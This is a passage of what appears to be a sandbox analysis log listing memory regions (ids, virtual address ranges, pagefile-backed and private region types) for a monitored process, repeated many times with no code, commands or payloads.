region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11207 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11208 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11209 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11210 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11211 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11212 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11213 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11214 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11215 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11216 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11217 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11218 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11219 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11220 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11221 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11222 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11223 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11224 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11225 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11226 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11227 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11228 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11229 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11230 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11231 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11232 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11233 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11234 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11235 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11236 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11237 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11238 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11239 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11240 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11241 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11242 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11243 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11244 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11245 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11246 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11247 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11248 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11249 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11250 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11251 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11252 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11253 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11254 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11255 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11256 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11257 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11258 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11259 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11260 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11261 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11262 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11263 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11264 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11265 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11266 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11267 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11268 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11269 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11270 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11271 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11272 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11273 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11274 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11275 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11276 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11277 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11278 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11279 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11280 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11281 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11282 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11283 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11284 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11285 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11286 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11287 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11288 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11289 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11290 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11291 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11292 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11293 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11294 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11295 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11296 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11297 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11298 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11299 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11300 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11301 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11302 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11303 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11304 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11305 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11306 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11307 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11308 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11309 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11310 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11311 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11312 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11313 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11314 start_va = 0x530000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11315 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11316 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11317 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11318 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11319 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11320 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11321 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11322 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11323 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11324 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11325 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11326 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11327 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11328 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11329 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11330 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11331 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11332 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11333 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11334 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11335 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11336 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11337 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11338 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11339 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11340 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11341 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11342 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11343 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11344 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11345 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11346 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11347 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11348 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11349 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11350 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11351 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11352 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11353 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11354 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11355 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11356 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11357 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11358 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11359 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11360 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11361 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11362 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11363 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 11364 start_va = 0x3cf0000 end_va = 0x3d0bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cf0000" filename = "" Region: id = 11365 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11366 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11367 start_va = 0x2370000 end_va = 0x237dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002370000" filename = "" Region: id = 11368 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11369 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11370 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11371 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11372 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11373 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11374 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11375 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11376 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11377 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11378 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11379 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11380 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11381 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11382 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11383 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11384 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11385 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11386 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11387 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11388 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11389 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11390 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11391 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11392 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11393 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11394 start_va = 0x530000 end_va = 0x53dfff monitored = 1 entry_point = 